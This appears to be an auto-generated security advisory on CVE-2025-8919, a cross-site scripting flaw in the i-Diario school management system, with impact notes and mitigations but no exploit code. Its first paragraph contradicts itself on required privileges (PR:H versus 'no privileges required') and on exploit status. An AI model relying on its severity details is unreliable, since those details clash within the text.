CVE-2025-8919 is a cross-site scripting (XSS) vulnerability identified in the Portabilis i-Diario software, versions 1.0 through 1.6. The vulnerability resides in an unspecified function within the /objetivos-de-aprendizagem-e-habilidades file, part of the History Page component. The issue arises from improper sanitization or validation of the 'código/objetivo habilidade' argument, which allows an attacker to inject malicious scripts. This vulnerability can be exploited remotely without authentication, although it requires some user interaction (e.g., a victim clicking a crafted link or visiting a malicious page). The CVSS 4.0 vector indicates network attack vector (AV:N), low attack complexity (AC:L), no privileges required (PR:H indicates high privileges required, but this conflicts with the description; likely a vendor error or partial requirement), user interaction required (UI:P), and limited impact on integrity (VI:L) with no impact on confidentiality or availability. The vendor was notified but did not respond, and no patches or mitigations have been published. Although no known exploits are currently in the wild, the public disclosure of the exploit increases the risk of exploitation. XSS vulnerabilities can be leveraged to steal session cookies, perform actions on behalf of users, or deliver malware, especially in web applications used in educational environments like i-Diario, which is a digital diary and school management system widely used in Brazil and potentially other Portuguese-speaking countries.

For European organizations, the impact of this vulnerability depends on the adoption of Portabilis i-Diario or similar systems. If deployed, attackers could exploit the XSS flaw to execute arbitrary scripts in the context of authenticated users, potentially leading to session hijacking, unauthorized actions, or phishing attacks targeting educators, students, or administrators. This could compromise user privacy and data integrity within educational institutions. Although the CVSS score is medium, the risk is heightened by the lack of vendor response and absence of patches. The vulnerability could also be used as a foothold for further attacks within the network if combined with other vulnerabilities or social engineering. Given the educational focus, the impact on confidentiality is limited but the integrity of educational records and user trust could be damaged. The requirement for user interaction limits automated exploitation but does not eliminate risk, especially in environments where users may be less security-aware.

European organizations using Portabilis i-Diario should immediately implement input validation and output encoding on the affected parameters, particularly 'código/objetivo habilidade', to neutralize malicious scripts. Employing a web application firewall (WAF) with custom rules to detect and block XSS payloads targeting this endpoint can provide interim protection. Administrators should educate users about the risks of clicking unknown links and encourage cautious behavior. Monitoring web logs for suspicious requests to the /objetivos-de-aprendizagem-e-habilidades path can help detect exploitation attempts. If possible, isolate the affected component or restrict access to trusted users until a vendor patch is available. Organizations should also consider migrating to alternative platforms with better security support if vendor responsiveness remains absent. Regular security assessments and penetration testing focused on XSS and input validation should be conducted to identify similar issues proactively.